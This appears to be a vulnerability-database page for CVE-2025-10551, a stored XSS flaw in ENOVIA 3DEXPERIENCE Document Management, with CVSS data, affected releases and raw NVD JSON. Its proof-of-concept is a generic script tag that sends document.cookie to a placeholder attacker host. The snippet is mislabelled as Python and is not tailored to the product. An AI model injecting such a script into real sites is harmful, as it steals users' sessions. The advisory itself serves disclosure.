CVE-2025-10551

Description

A Stored Cross-site Scripting (XSS) vulnerability affecting Document Management in ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:3ds:3dexperience:*:*:*:*:*:*:*:* - VULNERABLE

3DEXPERIENCE R2023x

3DEXPERIENCE R2024x

3DEXPERIENCE R2025x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for Stored XSS in Document Management -->
<!-- Attacker injects script into document title/description field -->
<script>
  // Example: Steal session cookie
  fetch('https://attacker-controlled-site.com/log?c=' + document.cookie);
  alert('XSS Triggered');
</script>
<!-- End PoC -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10551
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10551
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10551/
[4] VulDB https://vuldb.com/cve/CVE-2025-10551
[5] https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10551

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10551", "sourceIdentifier": "[email protected]", "published": "2026-03-31T09:16:21.623", "lastModified": "2026-04-13T13:28:22.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross-site Scripting (XSS) vulnerability affecting Document Management in ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) almacenado que afecta a la Gestión de Documentos en ENOVIA Collaborative Industry Innovator desde la versión 3DEXPERIENCE R2023x hasta la versión 3DEXPERIENCE R2025x permite a un atacante ejecutar código de script arbitrario en la sesión del navegador del usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:3ds:3dexperience:*:*:*:*:*:*:*:*", "versionStartIncluding": "r2023x", "versionEndIncluding": "r2025x", "matchCriteriaId": "5D800681-01F0-43E4-9525-BE188167D292"}]}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10551", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}